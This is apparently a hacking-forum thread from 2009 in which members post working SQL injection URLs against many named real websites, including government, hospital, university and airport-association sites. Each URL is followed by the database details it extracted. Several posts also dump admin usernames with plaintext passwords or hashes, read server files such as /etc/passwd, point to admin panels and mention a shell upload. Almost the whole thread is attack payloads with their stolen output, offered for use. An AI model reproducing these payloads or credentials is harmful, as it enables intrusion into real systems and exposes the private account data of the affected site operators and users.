http://www.ccaabelem.com.br/?pg=conteudoq&id=7987986491+UNION+SELECT+1,CONCAT(0x3a,(SELECT+C ONCAT(id_admin,0x3a,nome,0x3a,logina,0x3a,senhaa,0 x3a,privilegios)+FROM+ccaabelem.administrador+LIMI T+0,1),0x3a),3,4,5,6,7,8,9,10,11--
id_admin : nome : logina : senhaa : privilegios
:1 : Eugenio Augusto : guto :fgjasd : 1
:2 : Max:max : 34513451 : 2
:5 : douglas : douglas : 32451242:4
:4 : FABRIZIO : fabrizio :prado:1
:8 : polyanna : polyanna :2341234:4
http://www.ceci-br.org/novo/revista/printarticle.php?id=37+union+select+version(),user (),database(),4,5--&layout=html
Version: 4.0.27-locaweb-log
User: ceci_br1@200.234.200.80
Database: ceci_br1
http://www.bmwstyle.ru/bmw.php?id=-138+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8--+
db:5.0.67-0ubuntu6
name_db: www_bmwstyle_ru
user: bmwstyle@localhost
log: Admin
pass: admin123
-m0rgan-
31.03.2009, 23:31
innovations-forum-rodgau.de
http://www.innovations-forum-rodgau.de/memberinfo.php?id=-1+union+all+select+0,convert(version()+using+latin 1),convert(database()+using+latin1),3,convert(user ()+using+latin1),5,6,7,8,9,10,11,12,13,14--
user/version/db:
ifr@localhost:4.1.11-Debian_4sarge7-log:ifr_db
---------------------------------------------------------------------------------
The End!
M.W.N.N.
01.04.2009, 00:07
http://loonen.fmns.rug.nl/arcticstation/weblog.php?nr=111+union+select+1,concat(version(), 0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11
version():5.0.51a-3ubuntu5.4-log
database():loonenmsql1
user():loonenmsql1@localhost
http://loonen.fmns.rug.nl/arcticstation/weblog.php?nr=111+union+select+1,2,3,4,5,6,7,8,9,1 0,11+from+user
__
http://www.dromedaris.nl/link.php?id=1267+union+select+1,2,3,concat(version (),0x3a,database(),0x3a,user()),5,6+limit+1,1/*
version():4.1.20-log
database():dromedaris
user():dromed@localhost
__
http://scriptorium.serve-it.nl/view.php?sid=40+union+select+1,2,3,4,5,6,unhex(hex (concat(version(),0x3a,database(),0x3a,user()))),8 ,9,10,11,12,13,14,15,16,17,18,19+limit+1,1/*
version():4.1.12-standard
database():serve_scriptorium
user():serve_serve@localhost
http://scriptorium.serve-it.nl/view.php?sid=40+union+select+1,2,3,4,5,6,unhex(hex (concat(email,0x3a,password))),8,9,10,11,12,13,14, 15,16,17,18,19+from+scriptorium_users+limit+1,1/*
rembo@serve-it.nl:1ed8b85b1aee78c5
http://scriptorium.serve-it.nl/login.php
___
http://www.dho.nl/index.php?mid=2+union+select+1,2,3,4,concat(versio n(),0x3a,database(),0x3a,user()),6,7,8,9,10,11,12, 13,14,15,16+limit+1,1
version():5.0.51a-24-log
database():dho_nl
user():dho@hostingnode3.lan
__
http://www.brusselsmuseums.be/en/brusscard/participants.php?mid=25+union+select+1,2,concat(ve rsion(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19+limit+1,1/*
version():5.0.32-Debian_7etch8
database():bmuseum
user():pointbe@localhost
__
http://www.joodscultuurfestival.be/event.php?id=40+union+select+1,2,3,4,concat(versio n(),0x3a,database(),0x3a,user()),6,7,8,9,10,11+lim it+1,1
version():4.1.22-standard-log
database():joodscultuurfestival
user():detrezl@213.193.229.176
http://www.joodscultuurfestival.be/event.php?id=40+union+select+1,2,3,4,concat(id,0x3 a,user,0x3a,pass),6,7,8,9,10,11+from+admin+limit+1 ,1/*
1:lev:b59c67bf196a4758191e42f76670ceba
http://www.joodscultuurfestival.be/admin/
___
http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,concat (version(),0x3a,database(),0x3a,user()),4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28+limit+1,1/*
version():5.0.27
database():IIHE
user():root@localhost
http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,concat (user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql .user+limit+1,1/*
root:710789ba2a55b808
http://www.shipfinance.bm/index.php?id=462+AND+SUBSTRING((y() ),1,1)=x-- &pressrelease=1273904.html
y1=version
y2=database
y3=user
x=Version : 5.1.31-community
Database : OFR_shipfinance1208
User : shipfinance1208@localhost
-m0rgan-
01.04.2009, 00:15
http://www.bildstein-bueros.de/www/startnext/pop.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),us er(),database()),3,4,5,6,7,8,9,10,11,12--
user/version/db:
4.0.15-log:dom2671@localhost:dom2671
PR6
http://www.bridgesventures.com/news.php?newsID=54+AND+SUBSTRING((y() ),1,1)=x--/*
y1=version
y2=database
y3=user
x=Version : 3.23.49
Database : db2780
User : mysql2780@websrv5.netbenefit.co.uk
pr4@5.0.37-standard-log
http://www.phoneslimited.co.uk/description.php?id=10802+union+select+version()/*
PR5
http://www.asociatiait.ro/comunicate.php?NewsId=-36+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),useR()),6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20/*
Database Version: 4.1.22-log
Database name: apdetic
User name: apdetic@localhost
-m0rgan-
01.04.2009, 02:08
www.azw.at
http://www.azw.at/item.php?item_id=-1+union+all+select+0,1,2,3,4,5,6,7,8,9,concat_ws(0 x3a,user(),version(),database()),11,12,13,14,15,16 ,17,18--+
user/version/db:
nr00649_adm@localhost:5.0.32-Debian_7etch8-log:nr00649_db
PR5
http://www.nationmultimedia.com/breakingnews/read.php?newsid=-30082501+union+select+1,convert(concat_ws(0x3a,ver sion(),database(),user())+using+binary),3,4,5,6,7, 8,9,10,11,12,13,14
Database Version: 4.1.7-log
Database name: nationnews
User name: nation01@192.168.52.56
mailbrush
01.04.2009, 12:55
Happy April 1st!!! I'm finally home!
www.glenridgeposse.com/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
glenridge@localhost:q3stats:5.0.51a-3ubuntu5.4-log
www.glenridgeposse.com/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
file_priv=Y
gamez.proc.ru/q3-cpma/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
root@localhost:statq3cpma:5.0.45
gamez.proc.ru/q3-cpma/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
file_priv=Y
stats.ef-clan.org/fragland/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
fragland@cyberwebserver-21.de:fragland:5.0.32-Debian_7etch8-log
play.fuzzy76.net/statistics/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
vsp@localhost:vsp:5.0.67-0ubuntu6
objstats.tce-massa.com/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
obj0307@localhost:obj0307:5.0.60-log
western.bsdmon.com/vsp/pub/themes/westernq3/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
vsp@localhost:westernvsp_dm:5.0.51
gry.isko.net.pl/statystyki/et27980/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
vspet27980@localhost:vsp27980:5.0.54-log
PR4
http://scmsgroup.org/php/show_newsdetails.php?newsid=-49+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8,9
Version : 4.1.22-community
Database : db2522
User : c2172@ns104.fastdnsservers.com
http://scmsgroup.org/php/show_newsdetails.php?newsid=-49+union+select+1,2,concat_ws(0x3a,username,userpa ssword),4,5,6,7,8,9+from+admin
erihtoney
01.04.2009, 15:03
http://www.ls.huji.ac.il/grulabs/member.php?id=-1+union+select+concat_ws(0x3a3a20203a3a,version(), database(),user()),2,3,4,5,6,7
version: 4.1.22-community-max-nt-log
database: inglor_fb
user: inglor@ktalav.cc.huji.ac.il
___________________
Department of tourism and Resorts of Georgia
http://www.dotr.gov.ge/eng/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x203a20,versio n(),user(),database()),7,8
version: 5.0.67-community
database: dotrgovg_tourism
user: dotrgovg@localhost
all tables:
http://www.dotr.gov.ge/eng/news.php?id=-1+union+select+1,2,3,4,5,table_name,7,8+from+infor mation_schema.tables
user:
http://www.dotr.gov.ge/eng/news.php?id=-1+union+select+1,2,3,4,5,column_name,7,8+from+info rmation_schema.columns+where+table_name='user'
admin:
http://www.dotr.gov.ge/eng/news.php?id=-1+union+select+1,2,3,4,5,name,7,8+from+user--
name: admin
password: ********* :)
admin panel:
http://www.dotr.gov.ge/
PR5
two sites on one database
http://www.yourcommunicationnews.com/news_item.php?newsID=11176+AND+SUBSTRING((y()),1,1 )=x
http://www.yourindustrynews.com/index.php?region=1+AND+SUBSTRING((y() ),1,1)=x
y1=version
y2=database
y3=user
x=Version : 5.0.51
Database : db_YourIndustryNews
User : eastcoast@localhost
-m0rgan-
01.04.2009, 18:45
http://www.vipaspa.it/de/news_scheda.php?idn=-1+union+all+select+0,convert(user()+using+latin1), convert(version()+using+latin1),convert(database() +using+latin1),4--+
user/version/db:
dbvipa@66.71.190.34:4.1.16-standard-log:530220vipa
PR5
http://www.sundaystandard.info/news/news_item.php?NewsID=3302&GroupID=3+and+substring(y(),1,1)=x
y1=version
y2=database
y3=user
x=Version: 5.0.67-community-log
Database : sundaysf_ss
User : sundaysf_ss@localhost
Target: www.nasr.com.au
Evil link: http://www.nasr.com.au/release.asp?NewsId=-31152+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21--
Version: 4.1.22-community-nt
database: snet
user: root@localhost
OS: Windows Server 2003
Reading files:
http://www.nasr.com.au/release.asp?NewsId=-31152+union+select+1,2,3,4,5,6,7,load_file(0x633a5 c626f6f742e696e69),9,10,11,12,13,14,15,16,17,18,19 ,20,21--
Where 0x633a5c626f6f742e696e69 is c:\boot.ini in hex representation.
PR5
http://www.traffictechnologytoday.com/news.php?NewsID=-11440+union+select+1,2,3,concat_ws(0x3a,version(), database(),useR()),5,6,7,8,9,10
Database Version: 4.1.15-Debian_0.dotdeb.4-log
Database name: passenger
User name: passenger01@62.128.157.148
PR6
http://www.tropicalforesttrust.com/news-detail.php?newsid=-74+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),useR()),5,6,7,8,9,10,11,12,13,14
Database Version: 4.0.27-standard-log
Database name: db200813045
User name: dbo200813045@212.227.114.142
-m0rgan-
01.04.2009, 19:17
http://www.sottoilmare.it/archivionews.php?getid=-1+union+all+select+0,1,concat_ws(user(),version(), database()),3,4,5,6,7--+
user/version/db:
4.1.23-pro-gpl-logMV2696_sim@81.88.49.17sottoilmare_it_data
----------------------------------------------------------------------
http://www.senor.es/ingles/ver_novedades.php?idn=-1+union+all+select+concat_ws(user(),version(),data base()),1,2,3,4--
user/version/db:
5.0.45-community-ntsenor_usuario@localhostsenorbd
---------------------------------------------------------------------
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-1+union+all+select+0,1,concat_ws(user(),version(), database()),3,4,5,6,7,8,9,10--
user/version/db:
5.0.4532908_user116602@lnh-util.bluehalo.myregisteredsite.com32908_leadacidba tteryinfoorg
----------------------------------------------------------------------------------------
The End!
PR6
http://www.ethanol.org/news/index.php?newsid=-25+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8
Database Version: 5.0.77-community
Database name: ethanol_ethanol
User name: ethanol_ethanol@localhost
http://www.uniteck.ru/?type=-560+union+select+1,2,3,concat_ ws(0x3a,version(),database(),user()),5,6,7,8--
Database Version : 5.0.41-log
Database name : uniteck
User name : uniteck@cub.mplik.ru
admin :
http://www.uniteck.ru/?type=-560+union+select+1,2,3,concat_ws(0x3a,logi n,pass),5,6,7,8+from+user--
admin:683a6aad2b7543f113cf2ba32b42c2d8 - 1972oxa
login from the site (http://uniteck.ru)
PR5
http://www.gaspowered.com/newsletters.php?newsID=20+AND+ASCII(SUBSTRING((sel ect+y()),1,1))>x--
y1=version
y2=database
y3=user
x1=53,46,48,46,53,49,97,45,99,111,109,109,117,110, 105,116,121,45,108,111,103
x2=103,97,115,112,111,119,101,114
x3=103,97,115,112,111,119,101,114,64,108,111,99,97 ,108,104,111,115,116
Version : 5.0.51a-community-log
Database : gaspower
User : gaspower@localhost
PR4
http://www.ootpdevelopments.com/article.php?newsid=396+AND+SUBSTRING((y())1,1))=x
x=Version : 5.0.26
Database : misc
User : ootpdevmisc@localhost
M.W.N.N.
01.04.2009, 19:43
http://www.pna.gov.ph/index.php?idn=1&sid=&nid=1&rid=79746+union+select+1,2,3,concat(version(),0x3a ,database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21/*
version():4.0.20a-nt
database():test
user():root@localhost
http://www.pna.gov.ph/index.php?idn=1&sid=&nid=1&rid=79746+union+select+1,2,3,concat(user,0x3a,pass word),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1+from+mysql.user/*
__
http://www.contraloriabarrancabermeja.gov.co/article.php?sid=5+union+select+1,2,3,4,5,6,7,8,9,1 0,11
sarmat2009
01.04.2009, 20:07
http://www.ftsr.ru
http://www.ftsr.ru/news.php?news_id=-1+union+select+1,2,concat(0x3a,da tabase(),0x3a,user(),0x3a,version()),4,5,6,7--
ftsr139_2007
ftsr139_2007@v26.valuehost.ru
mysql 4.0.27-log
PR3
http://www.comeraghcc.com/DisplayArticle.php?newsID=-216+union+select+1,concat_ws(0x3a,version(),databa se(),useR()),3,4,5,6,7,8
Database Version: 5.0.51a-community
Database name: comerag_Comeragh
User name: comerag_cathal@localhost
PR3
http://architectureinc.com/news/index.php?newsid=-69+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8
Database Version: 5.0.45
Database name: architectureincdb
User name: architectureinc@localhost
PR3
http://www.prairieberry.com/news/index.php?newsid=-19+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8,9
Database Version: 5.0.45
Database name: prairieberrydb
User name: prairieberry@localhost
KaMuKaDzE
01.04.2009, 21:17
http://www.zora.ru/?a=show&id=-147+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11--
version / 4.0.27-standard-log
database / zora
user / zora@localhost
http://www.unitedparts.ru/catalog.php?id=2+union+select+concat_ws(0x3a,versi on(),database(),user()),2,3,4--
version / 5.0.67-log
database / u44238_3
user / u44238@10.10.223.208
http://blackhillslots.com/news/?newsid=-5+UNION+SELECT+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8
Database Version: 5.0.45
Database name: blackhillslotsdb
User name: blackhillslots@localhost
http://midwestalarm.com/news/?newsid=-6+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8
Database Version: 5.0.45
Database name: midwestalarmdb
User name: midwestalarm@localhost
http://klockwerkscycles.com/news.php?newsid=-194+union+select+1,2,concat_ws(0x3a,version(),data base(),useR()),4,5,6,7
Database Version: 5.0.45-log
Database name: klockwerksdb
User name: klockwerks@localhost
http://studsovet.wl.dvgu.ru/index.php?id=-375+union+select+concat_ws(0x3a,user_login,user_pa ss,user_nicename,user_url,user_status)+from+wp_vi_ users--
database : 5.0.67
tables : wp_vi_users
log: admin
pass: admin
Australian Airports Association (pr5)
hackers are attacking airports (=
http://www.aaal.com.au/category.php?id=18+AND+ASCII(SUBSTRING((select+y() ),1,1))>x/*
y1=version
y2=database
y3=user
x1=52,46,49,46,49,49,45,68,101,98,105,97,110,95,52 ,115,97,114,103,100,55
x2=97,97,97,108
x3=97,105,114,112,111,114,116,115,64,108,111,99,97 ,108,104,111,115,116
version() - 4.1.11-Debian_4sargd7
database() - aaal
user() - airports@localhost
---------------------------------------------------------------------------------------------------------------
http://www.speedcarseries.com/news/index.php?newsid=-101+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11
Database Version: 5.0.41-community
Database name: speedcar
User name: speedcar@localhost
http://dtsf.com/news/index.php?newsid=-302+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6
Database Version: 5.0.45
Database name: dtsfdb
User name: dtsf@localhost
admin:incognito
http://signaturehomesllc.com/news/index.php?newsid=-20+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8,9,10
Database Version: 5.0.51a-3ubuntu5.4
Database name: signaturehomes
User name: signaturehomes@localhost
http://sfseminary.edu/news/index.php?newsid=-198+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8
Database Version: 5.0.45
Database name: sfseminary_edu
User name: sfseminary@localhost
Jokester, they changed the database and the site engine, but the SQL injection is still there... I don't know whether this can be counted as a repost
http://truth-4-youth.net/news/index.php?newsid=-15+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8,9
Database Version: 4.1.22
Database name: truth4youthdb
User name: truth4youth@localhost
http://brookingshealth.org/news/?newsid=-214+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),useR()),6,7,8,9,10,11--
Database Version: 5.0.45
Database name: brookingshealthdb
User name: brookingshealth@localhost
http://huronregional.org/news/index.php?newsid=-401+union+select+1,2,concat_ws(0x3a,version(),data base(),useR()),4,5,6,7,8,9,10,11,12,13&id=58
Database Version: 5.0.45
Database name: huronregionaldb
User name: huronregional@localhost
http://www.luvernecommunityhospital.org/news.php?newsid=-218+union+select+1,2,concat_ws(0x3a,version(),data base(),useR()),4,5,6,7,8
Database Version: 5.0.45
Database name: sanfordluvernedb_new
User name: newsanford@localhost
http://nwiowahealthcenter.org/news.php?newsid=-75+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6
Database Version: 5.0.45
Database name: northwestiowadb
User name: northwestiowa@localhost
http://prairielakes.com/news/index.php?newsid=-417+union+select+1,2,concat_ws(0x3a,version(),data base(),useR()),4,5,6,7,8,9,10,11--
Database Version: 5.0.45
Database name: prairielakesdb
User name: prairielakes@localhost
http://urgentcareemr.com/news/index.php?newsid=-19+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8,9--
Database Version: 5.0.45
Database name: docutapdb
User name: docutap@localhost
http://www.sfsurgical.com/news/index.php?newsid=-5+union+select+1,2,concat_ws(0x3a,version(),databa se(),useR()),4,5,6,7,8,9
Database Version: 5.0.45
Database name: sfsurgicaldb
User name: sfsurgical@localhost
http://mywellnessadvantage.com/news/index.php?id=&newsid=-6+union+select+1,2,concat_ws(0x3a,version(),databa se(),useR()),4,5,6,7,8,9
Database Version: 5.0.45
Database name: westernhealthdb
User name: westernhealth@localhost
http://www.welcoa.org/news.php?entryid=-489+union+select+1,2,concat_ws(0x3a,version(),data base(),useR()),4,5,6,7,8,9,10,11,12,13,14,15
Database Version: 5.0.45
Database name: welcoadb
User name: welcoa@localhost
http://web-book.ru/index.php?page=details&book=-1+union+select+1,2,3,4,CONCAT_WS(0x2C,USER(),DATAB ASE(),VERSION()),6,7,8,9,10,11,12
dbuser: dbu_tyre1_1@192.168.7.19
dbname: db_tyre1_1
Version: 4.1.22-log
lunch
http://ist.stmary.edu/alumni.php?alumniID=49+union+select+1,user(),3,4,5 ,6,7,8+limit+1,1/*
User:root
Version:5.0.27-community-nt
[ist.stmary.edu Not a repost]
ps: for those who will be looking for paths ;-)
http://ist.stmary.edu/news/images/smilies/WS_FTP.LOG
=======================================
http://www.studentservices.aero.und.edu/f4_Jobs%20and%20Scholarships/view_job.php?JobID=1311+order+by+32/*
Version: 5.0.22
User: studentservices@mozart.aero.und.edu
Dbname: studentservices
table users:
asn:asn
salvesen:jubalon
henryb:henryb
amy:jake
kim:ecolab
tbarrett:tbear
http://www.studentservices.aero.und.edu/admin/index.php
AkyHa_MaTaTa
02.04.2009, 13:05
directrix.ru TIC 2000 PR 3
http://directrix.ru/cat?tag=331212212121231+union+select+1,2,concat_ws (0x3A,user(),@@version,database()),4,5,6,7--+
user(): wwditrix@localhost
version(): 5.0.51a-17vc-log
database(): directrix
sql-blind
http://www.puppets.ru/index.php?id=85'+and+ascii(substring(version(),1,1 ))=53--+
database: 5.0.51
"Official website of the Investigative Directorate of the Investigative Committee..."
http://www.skprok.tver.ru/news/?new_id=110+and+1=0+union+select+1,2,3,4,5,6,7,8,9 ,0--
molotovkeyt
02.04.2009, 18:34
Art atelier "Kostumer" + information portal "Kostumer"
http://www.kostumer.ru/biograph_SB.php3?m=6&id=-1+union+select+1,2,3,4/*
Database Version: 4.1.9-log
http://breadmaker.karasik.org/viewRecipe.php?ID=-10+union+select+1,unhex(hex(concat_ws(0xa,username ,user_password))),3,4,5,6,7,8,9+from+karasik_bread board.phpbb_users+limit+1,1--+
db: 5.0.67-msl-icd1-log
name_db: karasik_breadmaker
user: karasik@localhost
table: phpbb_users
database:karasik_breadboard
login: karasik
pass: kkkVVV
+limit+x,x--+
--------------------------------------------------
http://prazdnik.com.ua/index.php?id=54&pid=-35180'+union+select+concat_ws(0x3a,version(),datab ase(),user()),2--+
db: 5.0.44
name_db: newprazdnik
user: u_newprazdni@localhost
http://prazdnik.com.ua/admin/
log: prazdnik
pass: 12345
http://www.npo-saturn.ru/!new/?act=gm_look&id=-1238156655+uNioN+SeLecT+1,concat_ws(0x3a,version() ,da tabase(),user()),3,4,5,6,7,8,9,10,11,12--
Database Version : 5.0.67
Database name : saturn
User name : saturn@zvm11.host.ru
adm :
http://www.npo-saturn.ru/!new/?act=gm_look&id=-1238156655+uNioN+SeLecT+1,concat_ws(0x3a,name,pass wd),3,4,5,6,7,8,9,10,11,12+from+s_ users+limit+0,1--
sokolov_ка:wJwVyTMy_spr
moder:mashaalenamoders
couldn't find the admin panel itself :rolleyes:
-m0rgan-
02.04.2009, 21:00
http://www.hdtinfo.com/news/read.php?id=-1+union+all+select+0,concat_ws(version(),user(),da tabase()),2,3,4--
user/version/db:
news@localhost5.0.51a-logmmnews
.:[melkiy]:.
02.04.2009, 23:14
http://dornerworks.com/?p=news&id=-1+union+select+1,2,3--
Database Version: 5.0.67-community
Database name: pigvomit_dnwwebsite
User name: pigvomit_dorner@localhost
http://egyco-egypt.com/English/newsdetail.php?ID=-15+union+select+1,2,3,4--
Database Version: 5.0.77-community
Database name: egycoeg_egyco
User name: egycoeg_egyco@localhost
Login: egico
Pass:egico1
http://www.line.com.ua/magazin.php?id=-1+union+select+1,2,3--
Database Version: 5.0.51a-community
Database name: abook_line
User name: abook_linecom@localhost
About 350 users! I didn't bother dumping all of them =)
http://www.mistelle.fr/news.php?id=-1+union+select+1,2,3,4,5,6,7--
Database Version: 5.0.68-log
Database name: mistelle
User name: mistelle@10.0.75.182
Users: http://www.mistelle.fr/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,password,use rname),6,7+from+pun_users--
http://www.geotek.co.uk/site/scripts/news.php?id=-1+union+select+1,2,3,4,5,6--
Database Version: 4.0.24_Debian-10sarge2
Database name: geotekmain
User name: geotekmain@localhost
http://www.ecop.org.ph/news.php?id=-99+union+select+1,2,3,4,5--
Database Version: 4.1.22-standard-log
Database name: ecoporg_db
User name: ecoporg_user@localhost
http://windsurfing-by.org/news.php?id=-1+union+select+1,2,3,4,5,6,7,8--
Database Version: 5.0.32-Debian_7etch6-log
Database name: windsurf_com
User name: windsurf_user@localhost
http://www.dflvwclub.de/cars.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20--
Database Version: 5032-debian_7etch8-log
Database name: aa34
User name: aa34@localhost
Login: admin
Pass: d9c4b5ac3b13e92e26b4e025586d8a8d : dflit
Dump forum users from the phorum_users table
<<Ya-Hha - Official website of Rashid Nugmanov>>
http://www.yahha.com/article.php?sid=-145+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user()),5,6,7,8,9,10,11,12,13--+
db: 5.0.67-community
name_db: yahha_mpn
user: yahha_admin@localhost
table:mpn_authors , db: yahha_mpn
log: RN
pass: xer0mem
This is the site owner (not the admin, login is right on the main page)
-------------------------------------------------------------
limit+186,1--+
table: mpn_users
name: Андрей Дамер
log: damer
pass: 250676
+limit+X,x--+
all the users..........
--------------------------------------------------------------
Checked for reposts with SQL Injections [AntiBoyan] CheckeR
Pr 4
http://campisis.us/locdetail.php?id=2 %26%26 1%3D2 UNION SELECT 1,CONCAT(0x6467797436,CONCAT_WS(0x203A20,VERSION() ,DATABASE(),USER()),0x3566646B68),3,4,5,6,7,8,9,10 ,11,12 %23
VERSION(),DATABASE(),USER()
4.1.22-max-log : campisis : campisis@72.167.131.114
==
PR3
http://hamercaz.com/hamercaz/site/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12--
5.0.22
==
.:[melkiy]:.
03.04.2009, 18:45
http://www.interbridge.ee/?lang=ru&what=news&id=-1+union+select+1,2,3--
Database Version: 5.0.32-Debian_7etch6-log
Database name: interbridge
User name: interbridge@localhost
http://www.spurway.ca/news&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
Database Version: 5.0.22
Database name: pg_org_spurway
User name: spurway@localhost
http://www.fourwinds-rv.com/?page=news&id=-1+union+select+1,2,3,4,5--
Database Version: 4.1.7-log
Database name: fourwinds-rv
User name: databaseadmin@elk1.elkhart.net
There is access to mysql.user
13 users
IMHO, this is the admin! It doesn't output root's password((
Login: adminatcomp
Pass:07d8ece224cf7ece : ???
Kyiv-style billiards
http://kiev.duplet.com.ua/?R=arhive&id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22--
Database Version: 5.0.67-community-log
Database name: dupletc_kiev
User name: dupletc_kadm@localhost
<<Official website of the football club "KAMAZ">>
http://www.fckamaz.ru/pages/news.php?id=-472+union+select+1,concat_ws(0x3a,table_name,table _schema),3,4,5,6,7,8+from+information_schema.colum ns+where+column_name+like+0x70617373776f7264--+
db: 5.0.75
name_db: fckamazru
user: fckamazru@78.108.81.121
-------------------
http://www.fckamaz.ru/admin
-------------------
table: wp_users , db: fckamazru_wordpress
log: admin
pass: 03ecc478f8949ec82c3b4a6fcecd0305 :(
-------------------
table: users
log: Спарк
pass: sdfsdt34t34
+limit+x,x--+
-------------------
table: users2007
log: Спарк - (Site administrator)
pass: nw21
+limit+x,x--+
--------------------------------------------
--------------------------------------------
http://www.krainamriy.com/news.php?id=-46+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9,10,11--+
db: 4.1.22-log
name_db: krainamriy
user: krainamriy@localhost
PR 7
http://www.icimod.org/enews/custom.page.php?id=-1+union+select+1,version()--
4.1.22-standard
M.W.N.N.
03.04.2009, 21:25
http://www.cultura.mt.gov.br/conteudo.php?sid=54&cid=543++union+select+1,2,3,4,5,6,7,concat(version (),0x3a,database(),0x3a,user()),9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+ limit+1,1/*
version():4.1.22-standard-log
database():MYSDCP02
user():SDC_User2@192.168.0.4
__
http://www.stips.minpolj.sr.gov.yu/print.php?sid=2+union+select+concat(version(),0x3a ,database(),0x3a,user()),2,3,4,5,6+limit+1,1/*
version():5.0.44-debug-log
database():minmiss
user():minmiss@localhost
__
http://glastonbury.gov.uk/g_gov/article.php?op=Print&sid=377+union+select+1,2,concat(version(),0x3a,dat abase(),0x3a,user()),4,5,6,7,8+limit+1,1/*
version():5.0.32-Debian_7etch8-log
database():glastonb
user():glastonb@localhost
__
http://www.bushnell.illinois.gov/newsStory.php?NewsID=11%27+union+select+1,2,3,4,5, concat(version(),0x3a,database(),0x3a,user()),7,8, 9,10,11,12,13,14/*
version():4.1.20
database():ci_bushnell_illinois_gov_-_data
user():bushnell@localhost
-m0rgan-
03.04.2009, 21:57
http://www.priefert.com.au/newsDetail.php?ID=-1+union+all+select+0,1,concat_ws(0x3c62723e,versio n(),user(),database()),3--
user/version/db:
priefert_admin@srv19.ezyreg.com
4.1.22-standard
priefert_products
-----------------------------------------------------------------------
http://www.viewsonic.com.au/pr/show.php?id=-1+union+all+select+0,1,2,concat_ws(0x3c62723e,user ,password,file_priv),4,5,6,7,8+from+mysql.user--
login/pass:
root
750ce2a25a8d1ad5
file_priv:Y
http://www.viewsonic.com.au/pr/show.php?id=-1+union+all+select+0,1,2,concat_ws(0x3c62723e,user (),version(),database()),4,5,6,7,8+from+mysql.user--
user/version/db:
web@localhost 4.1.22-log vsau
-----------------------------------------------------------------------
The End!
http://www.psicodietnews.org/page.php?id=-1+union+select+1,2,concat_ws(0x3a,user,password),4 ,5+from+administrator--
http://www.psicodietnews.org/admin/admin.php
The shell uploads )
pr5
http://www.menzelinsk.ru/average_special_educational.php?average=999+union+ select+0,version(),2,3,4,5,6,7,8,9,10,11,12,13,14, 15--
tabl:
a_ad_users(login,pass)
chelnyclub : club (only one record, couldn't find the admin panel =( )
a_nla07_users (login,pass)
version() 5.0.67-log
user() u23836@10.10.10.201
database() u23836
pr4
http://www.moretonisland.com.au/product.php?id=67764+union+select+1,2,concat_ws(ch ar(32,32),version(),user(),database()),4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30--
version() 4.0.17
user() moreton@localhost
database() moreton
pr5
